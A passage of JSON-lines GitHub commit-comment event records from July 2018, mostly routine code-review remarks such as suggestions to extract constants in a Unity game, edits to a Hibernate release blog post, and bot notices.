commit"}},"created_at":"2018-07-04T12:52:18Z"}
{"id":"7918305435","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594974,"position":8,"line":15,"path":"Assets/Scritpt/MixerVolume.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:53:01Z","updated_at":"2018-07-04T12:53:01Z","author_association":"NONE","body":"extrair constantes"}},"created_at":"2018-07-04T12:53:01Z"}
{"id":"7918306809","type":"CommitCommentEvent","actor":{"login":"Soumil07"},"repo":{"name":"dirigeants/klasa-pieces"},"payload":{"comment":{"id":29594977,"position":56,"line":56,"path":"commands/General/Chat Bot Info/help.js","commit_id":"0e49fe179ad8d695a1f011844c1b9a43da68bfb1","created_at":"2018-07-04T12:53:18Z","updated_at":"2018-07-04T12:53:18Z","author_association":"CONTRIBUTOR","body":"const { prefix } = message.guildConfigs;"}},"created_at":"2018-07-04T12:53:18Z"}
{"id":"7918307064","type":"CommitCommentEvent","actor":{"login":"sklar"},"repo":{"name":"datasapiens/ui-kit"},"payload":{"comment":{"id":29594979,"position":null,"line":null,"path":null,"commit_id":"9bae46a11990212fcb32cde5566d7b868ff11c3c","created_at":"2018-07-04T12:53:21Z","updated_at":"2018-07-04T12:53:21Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Print Mode: Numbers are blurred](https://trello.com/c/jHufEbe3/2105-print-mode-numbers-are-blurred)"}},"created_at":"2018-07-04T12:53:21Z"}
{"id":"7918307173","type":"CommitCommentEvent","actor":{"login":"davidjin0813"},"repo":{"name":"springware1/ccm"},"payload":{"comment":{"id":29594980,"position":7,"line":1162,"path":"tests/1/dir/index.h","commit_id":"e9d1a1a381463e7d8a07a69bb2fd8bc11a81a2f3","created_at":"2018-07-04T12:53:22Z","updated_at":"2018-07-04T12:53:22Z","author_association":"NONE","body":"davidjin0813"}},"created_at":"2018-07-04T12:53:22Z"}
{"id":"7918309083","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29594985,"position":13,"line":13,"path":"Assets/Scritpt/Gameplay/SegueMouse.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:53:45Z","updated_at":"2018-07-04T12:53:45Z","author_association":"NONE","body":"se der mantenha como constante"}},"created_at":"2018-07-04T12:53:45Z"}
{"id":"7918309415","type":"CommitCommentEvent","actor":{"login":"MignotMorgan"},"repo":{"name":"MignotMorgan/Mon-CV"},"payload":{"comment":{"id":29594986,"position":null,"line":null,"path":null,"commit_id":"1533d334118aaaf7ede19586d9d508dd58c2fedc","created_at":"2018-07-04T12:53:48Z","updated_at":"2018-07-04T12:53:48Z","author_association":"OWNER","body":"split"}},"created_at":"2018-07-04T12:53:48Z"}
{"id":"7918318501","type":"CommitCommentEvent","actor":{"login":"karelzak"},"repo":{"name":"karelzak/util-linux"},"payload":{"comment":{"id":29595002,"position":null,"line":null,"path":null,"commit_id":"917f53cf13c36d32c175f80f2074576595830573","created_at":"2018-07-04T12:55:35Z","updated_at":"2018-07-04T12:55:35Z","author_association":"OWNER","body":"libmount is C code.\r\n\r\nYes, pylibmount as separated project would be the best, but it requires to have someone who is ready to maintain it."}},"created_at":"2018-07-04T12:55:35Z"}
{"id":"7918321996","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595009,"position":22,"line":22,"path":"Assets/Scritpt/Gameplay/SegueMouse.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T12:56:14Z","updated_at":"2018-07-04T12:56:14Z","author_association":"NONE","body":"extrair número mágico"}},"created_at":"2018-07-04T12:56:14Z"}
{"id":"7918325478","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"mesonbuild/wrapweb"},"payload":{"comment":{"id":29595019,"position":null,"line":null,"path":null,"commit_id":"3f5e8879b2217c3edb1c594be2bd798dcd0a2e2c","created_at":"2018-07-04T12:56:55Z","updated_at":"2018-07-04T12:56:55Z","author_association":"MEMBER","body":"yeah! this is much better!"}},"created_at":"2018-07-04T12:56:55Z"}
{"id":"7918326937","type":"CommitCommentEvent","actor":{"login":"375gnu"},"repo":{"name":"CelestiaProject/Celestia"},"payload":{"comment":{"id":29595024,"position":null,"line":null,"path":null,"commit_id":"eaaf6d4634a3719b1f34f497504e43de009e7a78","created_at":"2018-07-04T12:57:12Z","updated_at":"2018-07-04T12:57:12Z","author_association":"CONTRIBUTOR","body":"@GottfriedSp could you make a separate PR for this commit?\r\n\r\nOn the other hand, maybe it worth to add `costate` check to `getAppCore` instead of adding it to every place where it's called? "}},"created_at":"2018-07-04T12:57:12Z"}
{"id":"7918331205","type":"CommitCommentEvent","actor":{"login":"SH-anonta"},"repo":{"name":"SH-anonta/Task-Tree-Client"},"payload":{"comment":{"id":29595031,"position":47,"line":44,"path":"src/app/page-components/register/register.component.ts","commit_id":"c4837cfa252873d28db79c84d9dc0c774f187fdc","created_at":"2018-07-04T12:58:04Z","updated_at":"2018-07-04T12:58:04Z","author_association":"OWNER","body":"@Dblaze47 Remove the todo comment and add more validations\r\nDo it on a separate branch "}},"created_at":"2018-07-04T12:58:04Z"}
{"id":"7918337055","type":"CommitCommentEvent","actor":{"login":"ArturT"},"repo":{"name":"LunarLogic/foosball-app"},"payload":{"comment":{"id":29595044,"position":14,"line":13,"path":"spec/features/ranking_elo_spec.rb","commit_id":"18f29b4a70db3ea488c10c739156ad48f9c4debc","created_at":"2018-07-04T12:59:12Z","updated_at":"2018-07-04T12:59:12Z","author_association":"MEMBER","body":"@yzmopolis you can use rails routes helpers here like `rankings_elo_path`."}},"created_at":"2018-07-04T12:59:12Z"}
{"id":"7918337878","type":"CommitCommentEvent","actor":{"login":"kbenoit"},"repo":{"name":"quanteda/quanteda"},"payload":{"comment":{"id":29595045,"position":34,"line":309,"path":"R/corpus.R","commit_id":"69ab93713425d9d43e34c56e7d7de1e34309aa46","created_at":"2018-07-04T12:59:22Z","updated_at":"2018-07-04T12:59:22Z","author_association":"COLLABORATOR","body":"Hmm, I’m not sure this is simpler. Shorter, yes. But it changes the behaviour too. Would it not be better to rename above on first conversion?"}},"created_at":"2018-07-04T12:59:22Z"}
{"id":"7918338591","type":"CommitCommentEvent","actor":{"login":"jaanes-1"},"repo":{"name":"jaanes-1/hello-world"},"payload":{"comment":{"id":29595047,"position":null,"line":null,"path":null,"commit_id":"7dfe41bcd5ff763c243a9fcd908039027a5b0c5d","created_at":"2018-07-04T12:59:31Z","updated_at":"2018-07-04T12:59:31Z","author_association":"OWNER","body":"Tämä on avaus istunto"}},"created_at":"2018-07-04T12:59:31Z"}
{"id":"7918343790","type":"CommitCommentEvent","actor":{"login":"yunfengziwen"},"repo":{"name":"yunfengziwen/-"},"payload":{"comment":{"id":29595058,"position":null,"line":null,"path":null,"commit_id":"4aa61f063ad48659638280a08efcb8e2822c5169","created_at":"2018-07-04T13:00:32Z","updated_at":"2018-07-04T13:00:32Z","author_association":"OWNER","body":"asdf f sdf sd "}},"created_at":"2018-07-04T13:00:32Z"}
{"id":"7918344525","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595059,"position":10,"line":10,"path":"Assets/Scritpt/Gameplay/Seguir.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:00:39Z","updated_at":"2018-07-04T13:00:39Z","author_association":"NONE","body":"parece que da pra ser uma constante"}},"created_at":"2018-07-04T13:00:39Z"}
{"id":"7918346777","type":"CommitCommentEvent","actor":{"login":"loicjaouen"},"repo":{"name":"dhlab-basel/knora.org"},"payload":{"comment":{"id":29595062,"position":40,"line":36,"path":"_layouts/default.html","commit_id":"2e13e9614fe271361f3bce3cbded2c472919b34b","created_at":"2018-07-04T13:01:05Z","updated_at":"2018-07-04T13:01:05Z","author_association":"NONE","body":"this is actually useless, there is no \"fill-remaining-space\" declared in sass"}},"created_at":"2018-07-04T13:01:05Z"}
{"id":"7918348926","type":"CommitCommentEvent","actor":{"login":"tompscanlan"},"repo":{"name":"vmware/vmware-pks-deploy"},"payload":{"comment":{"id":29595067,"position":null,"line":null,"path":null,"commit_id":"26fefeb24c8462dfb59bf5a9c67d8ab3fb1b820d","created_at":"2018-07-04T13:01:29Z","updated_at":"2018-07-04T13:01:29Z","author_association":"CONTRIBUTOR","body":"Also pinning in dockerfile.testing.  might want to make them identical."}},"created_at":"2018-07-04T13:01:29Z"}
{"id":"7918349251","type":"CommitCommentEvent","actor":{"login":"Soumil07"},"repo":{"name":"dirigeants/klasa-pieces"},"payload":{"comment":{"id":29595069,"position":32,"line":32,"path":"commands/General/Chat Bot Info/help.js","commit_id":"0e49fe179ad8d695a1f011844c1b9a43da68bfb1","created_at":"2018-07-04T13:01:33Z","updated_at":"2018-07-04T13:01:33Z","author_association":"CONTRIBUTOR","body":"MANAGE_REACTIONS isn't a thing in latest."}},"created_at":"2018-07-04T13:01:33Z"}
{"id":"7918351462","type":"CommitCommentEvent","actor":{"login":"yrodiere"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29595072,"position":12,"line":12,"path":"posts/Guillaume/2018-07-05-hibernate-orm-532-final-out.adoc","commit_id":"9ba81d4e663813d4a0a6fcdd320165965cde68b7","created_at":"2018-07-04T13:01:58Z","updated_at":"2018-07-04T13:01:58Z","author_association":"MEMBER","body":"It's a bit too much for my taste, I'd join the two sentences in a single paragraph and replace one of the exclamation mark with a simple dot."}},"created_at":"2018-07-04T13:01:58Z"}
{"id":"7918352174","type":"CommitCommentEvent","actor":{"login":"denistiano"},"repo":{"name":"HaedHutner/spring-chat"},"payload":{"comment":{"id":29595074,"position":5,"line":37,"path":"src/main/resources/templates/ChatMessage.html","commit_id":"11430bcfcedb3749aed95c1a77f083b4cbc8c947","created_at":"2018-07-04T13:02:07Z","updated_at":"2018-07-04T13:02:07Z","author_association":"COLLABORATOR","body":"@HaedHutner Защо не вкарате един bootstrap да направите апликацията супер красива без много зор и без да пишете css. Само bootstrap css вкарайте (ако желаете разбира се)"}},"created_at":"2018-07-04T13:02:07Z"}
{"id":"7918352770","type":"CommitCommentEvent","actor":{"login":"MrJackC"},"repo":{"name":"MrJackC/examxx"},"payload":{"comment":{"id":29595076,"position":null,"line":null,"path":null,"commit_id":"fe600f3cdbaa3f579b9ac03b6f581ca8ccb21b38","created_at":"2018-07-04T13:02:13Z","updated_at":"2018-07-04T13:02:13Z","author_association":"OWNER","body":"在线考试系统-驾校"}},"created_at":"2018-07-04T13:02:13Z"}
{"id":"7918353171","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595080,"position":9,"line":9,"path":"Assets/Scritpt/Ranking.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:02:18Z","updated_at":"2018-07-04T13:02:18Z","author_association":"NONE","body":"constante"}},"created_at":"2018-07-04T13:02:18Z"}
{"id":"7918357186","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595094,"position":11,"line":11,"path":"Assets/Scritpt/Ranking.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:03:08Z","updated_at":"2018-07-04T13:03:08Z","author_association":"NONE","body":"parece que da pra deixar como constante"}},"created_at":"2018-07-04T13:03:08Z"}
{"id":"7918365805","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595114,"position":56,"line":56,"path":"Assets/Scritpt/Ranking.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:04:53Z","updated_at":"2018-07-04T13:04:53Z","author_association":"NONE","body":"pode ser consstant"}},"created_at":"2018-07-04T13:04:53Z"}
{"id":"7918368726","type":"CommitCommentEvent","actor":{"login":"yrodiere"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29595120,"position":28,"line":28,"path":"posts/Guillaume/2018-07-05-hibernate-orm-532-final-out.adoc","commit_id":"9ba81d4e663813d4a0a6fcdd320165965cde68b7","created_at":"2018-07-04T13:05:30Z","updated_at":"2018-07-04T13:05:30Z","author_association":"MEMBER","body":"\"very much wanted\" => \"very much encouraged\"?"}},"created_at":"2018-07-04T13:05:30Z"}
{"id":"7918370546","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595123,"position":70,"line":70,"path":"Assets/Scritpt/Ranking.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:05:53Z","updated_at":"2018-07-04T13:05:53Z","author_association":"NONE","body":"número mágico, extraia para constante"}},"created_at":"2018-07-04T13:05:53Z"}
{"id":"7918370550","type":"CommitCommentEvent","actor":{"login":"Zinc-X"},"repo":{"name":"Zinc-X/readme.m"},"payload":{"comment":{"id":29595124,"position":null,"line":null,"path":null,"commit_id":"66f593b140448a88d3ed51d266accabc60841e89","created_at":"2018-07-04T13:05:53Z","updated_at":"2018-07-04T13:05:53Z","author_association":"OWNER","body":"git status\r\n"}},"created_at":"2018-07-04T13:05:53Z"}
{"id":"7918372262","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595127,"position":73,"line":73,"path":"Assets/Scritpt/Ranking.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:06:15Z","updated_at":"2018-07-04T13:06:15Z","author_association":"NONE","body":"extraia para um método"}},"created_at":"2018-07-04T13:06:15Z"}
{"id":"7918372506","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"DarkWav/SAC"},"payload":{"comment":{"id":29595128,"position":null,"line":null,"path":null,"commit_id":"633cf1fb5da8b1373eaa9fec96aa93211803f00c","created_at":"2018-07-04T13:06:18Z","updated_at":"2018-07-04T13:06:18Z","author_association":"NONE","body":"Dear @DarkWav:\nI regret to inform you that the release you submitted, named \"**SAC**\" (v3.4.3), for the project [SAC](https://poggit.pmmp.io/ci/DarkWav/SAC/SAC) on 2018-07-02T16:15:55.000Z, has been rejected.\n\nThe plugin name should not use aliases.\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-04T13:06:18Z"}
{"id":"7918373936","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595133,"position":80,"line":80,"path":"Assets/Scritpt/Ranking.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:06:37Z","updated_at":"2018-07-04T13:06:37Z","author_association":"NONE","body":"extrair método"}},"created_at":"2018-07-04T13:06:37Z"}
{"id":"7918374890","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595134,"position":84,"line":84,"path":"Assets/Scritpt/Ranking.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:06:49Z","updated_at":"2018-07-04T13:06:49Z","author_association":"NONE","body":"extrair método também"}},"created_at":"2018-07-04T13:06:49Z"}
{"id":"7918376936","type":"CommitCommentEvent","actor":{"login":"kilchenmann"},"repo":{"name":"dhlab-basel/knora.org"},"payload":{"comment":{"id":29595137,"position":40,"line":36,"path":"_layouts/default.html","commit_id":"2e13e9614fe271361f3bce3cbded2c472919b34b","created_at":"2018-07-04T13:07:13Z","updated_at":"2018-07-04T13:07:13Z","author_association":"MEMBER","body":"Yes it's true. It comes from another template, which I use normally. But it doesn't matter."}},"created_at":"2018-07-04T13:07:13Z"}
{"id":"7918377317","type":"CommitCommentEvent","actor":{"login":"yrodiere"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29595138,"position":34,"line":34,"path":"posts/Guillaume/2018-07-05-hibernate-orm-532-final-out.adoc","commit_id":"9ba81d4e663813d4a0a6fcdd320165965cde68b7","created_at":"2018-07-04T13:07:18Z","updated_at":"2018-07-04T13:07:18Z","author_association":"MEMBER","body":"\"tied to *internal* class names\", maybe. It's not obvious why API classes would be subject to refactoring."}},"created_at":"2018-07-04T13:07:18Z"}
{"id":"7918381765","type":"CommitCommentEvent","actor":{"login":"githubzhy"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":29595147,"position":null,"line":null,"path":null,"commit_id":"f963f80399deb1a2b44c1bac3af7123e8a0c9e46","created_at":"2018-07-04T13:08:12Z","updated_at":"2018-07-04T13:08:12Z","author_association":"NONE","body":"Android x86 libffmpeg.so\r\n“has text relocations. This is wasting memory and prevents security hardening. Please fix”\r\n问题描述：\r\n1 我使用的ffmpeg版本号 2.8 ，已经包含了本patch和以下patch。\r\nhttps://github.com/FFmpeg/FFmpeg/commit/f963f80399deb1a2b44c1bac3af7123e8a0c9e46\r\n2 相关编译选项 --target-os=linux --arch=x86 --cpu=i686 --enable-yasm\r\n3 so生成方式：用相关模块的.o文件生成。\r\n4 测试工具 Android studio模拟器。\r\n\r\n另外，编译的armv7a arm64和x86_64架构的ffmpeg动态库测试OK，没有此报错。\r\n"}},"created_at":"2018-07-04T13:08:12Z"}
{"id":"7918383788","type":"CommitCommentEvent","actor":{"login":"noohaM"},"repo":{"name":"noohaM/recoded"},"payload":{"comment":{"id":29595155,"position":null,"line":null,"path":null,"commit_id":"35098cec4a263acca9b0a65d061e22926570404e","created_at":"2018-07-04T13:08:38Z","updated_at":"2018-07-04T13:08:38Z","author_association":"OWNER","body":"i made some changes to your file.\r\n"}},"created_at":"2018-07-04T13:08:38Z"}
{"id":"7918383886","type":"CommitCommentEvent","actor":{"login":"yrodiere"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29595156,"position":41,"line":41,"path":"posts/Guillaume/2018-07-05-hibernate-orm-532-final-out.adoc","commit_id":"9ba81d4e663813d4a0a6fcdd320165965cde68b7","created_at":"2018-07-04T13:08:39Z","updated_at":"2018-07-04T13:08:39Z","author_association":"MEMBER","body":"This fallback mechanism even improves compatibility with 5.1, compared to 5.2.x, 5.3.0 and 5.3.1."}},"created_at":"2018-07-04T13:08:39Z"}
{"id":"7918385214","type":"CommitCommentEvent","actor":{"login":"teededung"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29595159,"position":77,"line":239,"path":"npc/re/merchants/OldGlastHeim_merchants.txt","commit_id":"6e8599cd5b161168e1ad5b8c23a8db2a7572d841","created_at":"2018-07-04T13:08:55Z","updated_at":"2018-07-04T13:08:55Z","author_association":"NONE","body":"@Atemo the .@part is empty"}},"created_at":"2018-07-04T13:08:55Z"}
{"id":"7918385650","type":"CommitCommentEvent","actor":{"login":"ShaneCurcuru"},"repo":{"name":"apache/whimsy"},"payload":{"comment":{"id":29595160,"position":null,"line":null,"path":null,"commit_id":"49df3c55210447ecf02fde1a95314b01b1c411d6","created_at":"2018-07-04T13:09:01Z","updated_at":"2018-07-04T13:09:01Z","author_association":"CONTRIBUTOR","body":"Was the file rename vue.min.js->xxvue.min.js intentional?  There are issues with the Agenda tool today. :smiling_imp:"}},"created_at":"2018-07-04T13:09:01Z"}
{"id":"7918385872","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595161,"position":10,"line":10,"path":"Assets/Scritpt/UI/ConfiguracaoSlider.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:09:04Z","updated_at":"2018-07-04T13:09:04Z","author_association":"NONE","body":"constante"}},"created_at":"2018-07-04T13:09:04Z"}
{"id":"7918387116","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595163,"position":12,"line":12,"path":"Assets/Scritpt/UI/ConfiguracaoSlider.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:09:19Z","updated_at":"2018-07-04T13:09:19Z","author_association":"NONE","body":"ver se da pra deixar como constante"}},"created_at":"2018-07-04T13:09:19Z"}
{"id":"7918387705","type":"CommitCommentEvent","actor":{"login":"yrodiere"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29595165,"position":43,"line":43,"path":"posts/Guillaume/2018-07-05-hibernate-orm-532-final-out.adoc","commit_id":"9ba81d4e663813d4a0a6fcdd320165965cde68b7","created_at":"2018-07-04T13:09:26Z","updated_at":"2018-07-04T13:09:26Z","author_association":"MEMBER","body":"What, it's over already? I am the only one to get some spotlight? :)"}},"created_at":"2018-07-04T13:09:26Z"}
{"id":"7918388019","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29595166,"position":null,"line":null,"path":null,"commit_id":"003773020cf858e7a959a736e0ef66ca9c3147c6","created_at":"2018-07-04T13:09:29Z","updated_at":"2018-07-04T13:09:29Z","author_association":"NONE","body":"Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-04T13:09:29Z"}
{"id":"7918388502","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595167,"position":28,"line":28,"path":"Assets/Scritpt/UI/ConfiguracaoSlider.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:09:36Z","updated_at":"2018-07-04T13:09:36Z","author_association":"NONE","body":"early return"}},"created_at":"2018-07-04T13:09:36Z"}
{"id":"7918391830","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595170,"position":13,"line":13,"path":"Assets/Scritpt/UI/ConfiguracaoVibrar.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:10:17Z","updated_at":"2018-07-04T13:10:17Z","author_association":"NONE","body":"extrair constante na string e número mágico, também extrair o método para ser avaliado"}},"created_at":"2018-07-04T13:10:17Z"}
{"id":"7918393144","type":"CommitCommentEvent","actor":{"login":"NewUser9"},"repo":{"name":"markszabo/IRremoteESP8266"},"payload":{"comment":{"id":29595178,"position":null,"line":null,"path":null,"commit_id":"16465302c0a22ce4068c0c87a633c56db22f02da","created_at":"2018-07-04T13:10:32Z","updated_at":"2018-07-04T13:10:32Z","author_association":"NONE","body":"Good one!"}},"created_at":"2018-07-04T13:10:32Z"}
{"id":"7918393295","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zopefoundation/zope.testrunner"},"payload":{"comment":{"id":29595179,"position":null,"line":null,"path":null,"commit_id":"e6659234c052ae9ec17a7185315d0e1db639c997","created_at":"2018-07-04T13:10:34Z","updated_at":"2018-07-04T13:10:34Z","author_association":"MEMBER","body":"The travis CI thread about 3.7 has an example of an optimized matrix using xenial only when necessary at https://github.com/travis-ci/travis-ci/issues/9069#issuecomment-401959085"}},"created_at":"2018-07-04T13:10:34Z"}
{"id":"7918394228","type":"CommitCommentEvent","actor":{"login":"yrodiere"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29595181,"position":20,"line":20,"path":"posts/Guillaume/2018-07-05-hibernate-orm-532-final-out.adoc","commit_id":"9ba81d4e663813d4a0a6fcdd320165965cde68b7","created_at":"2018-07-04T13:10:45Z","updated_at":"2018-07-04T13:10:45Z","author_association":"MEMBER","body":"See, yet another exclamation mark :) But maybe I'm just grumpy..."}},"created_at":"2018-07-04T13:10:45Z"}
{"id":"7918395602","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595183,"position":20,"line":20,"path":"Assets/Scritpt/UI/ConfiguracaoVibrar.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:11:01Z","updated_at":"2018-07-04T13:11:01Z","author_association":"NONE","body":"extrair método e deixar como early return"}},"created_at":"2018-07-04T13:11:01Z"}
{"id":"7918396425","type":"CommitCommentEvent","actor":{"login":"guilgautier"},"repo":{"name":"guilgautier/DPPy"},"payload":{"comment":{"id":29595185,"position":null,"line":null,"path":null,"commit_id":"d074667fad0e246c81e410f78350d037ac2a580d","created_at":"2018-07-04T13:11:11Z","updated_at":"2018-07-04T13:11:11Z","author_association":"OWNER","body":"Thx Rémi for initiating the tests!\r\nJust remember #3 and `Kernel` + `Restart & Clear Output` the notebooks"}},"created_at":"2018-07-04T13:11:11Z"}
{"id":"7918397088","type":"CommitCommentEvent","actor":{"login":"weduls"},"repo":{"name":"weduls/algorithm"},"payload":{"comment":{"id":29595187,"position":2,"line":1,"path":"README.md","commit_id":"1dedfc311b4b4d4fb91bab58c0755fb4da9940c6","created_at":"2018-07-04T13:11:18Z","updated_at":"2018-07-04T13:11:18Z","author_association":"OWNER","body":"자세히 기록해주세요"}},"created_at":"2018-07-04T13:11:18Z"}
{"id":"7918398006","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595189,"position":33,"line":33,"path":"Assets/Scritpt/UI/ConfiguracaoVibrar.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:11:28Z","updated_at":"2018-07-04T13:11:28Z","author_association":"NONE","body":"earling return e substituir números mágicos por constantee"}},"created_at":"2018-07-04T13:11:28Z"}
{"id":"7918398433","type":"CommitCommentEvent","actor":{"login":"ozemre"},"repo":{"name":"ozemre/deneme"},"payload":{"comment":{"id":29595191,"position":null,"line":null,"path":null,"commit_id":"bc1f54c7d71bdb7501c3a6a9243801ce56277b9d","created_at":"2018-07-04T13:11:33Z","updated_at":"2018-07-04T13:11:33Z","author_association":"OWNER","body":"dddd"}},"created_at":"2018-07-04T13:11:33Z"}
{"id":"7918399806","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/MyProjectEulerWork"},"payload":{"comment":{"id":29595195,"position":null,"line":null,"path":null,"commit_id":"82900959158e9370dc763c148f2afea1aaa3b594","created_at":"2018-07-04T13:11:49Z","updated_at":"2018-07-04T13:11:49Z","author_association":"CONTRIBUTOR","body":"Please add comments to explain your algorithm.\r\n\r\nSpecifically - please explain why you need to create a new HashMap every time."}},"created_at":"2018-07-04T13:11:49Z"}
{"id":"7918400268","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595197,"position":14,"line":14,"path":"Assets/Scritpt/UI/ItemRanking.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:11:55Z","updated_at":"2018-07-04T13:11:55Z","author_association":"NONE","body":"atributos como constante"}},"created_at":"2018-07-04T13:11:55Z"}
{"id":"7918400520","type":"CommitCommentEvent","actor":{"login":"gglee0127"},"repo":{"name":"weduls/algorithm"},"payload":{"comment":{"id":29595198,"position":2,"line":1,"path":"README.md","commit_id":"1dedfc311b4b4d4fb91bab58c0755fb4da9940c6","created_at":"2018-07-04T13:11:58Z","updated_at":"2018-07-04T13:11:58Z","author_association":"COLLABORATOR","body":"@weduls 네 알겠습니다."}},"created_at":"2018-07-04T13:11:58Z"}
{"id":"7918402720","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29595205,"position":18,"line":18,"path":"Assets/Scritpt/UI/NovaPontuacao.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T13:12:22Z","updated_at":"2018-07-04T13:12:22Z","author_association":"NONE","body":"constante no -1"}},"created_at":"2018-07-04T13:12:22Z"}
{"id":"7918403092","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29595207,"position":28,"line":28,"path":"hw4naz (2)/App.js","commit_id":"fbc0181079c98755cbab4dace9ad128d8498b971","created_at":"2018-07-04T13:12:26Z","updated_at":"2018-07-04T13:12:26Z","author_association":"NONE","body":"Как-то у тебя непоследовательно названы эти два поля. Кажется, правильнее было бы `addFriendScreenShow` / `addFriendModalShow` и `addBillScreenShow` / `addBillModalShow`."}},"created_at":"2018-07-04T13:12:26Z"}
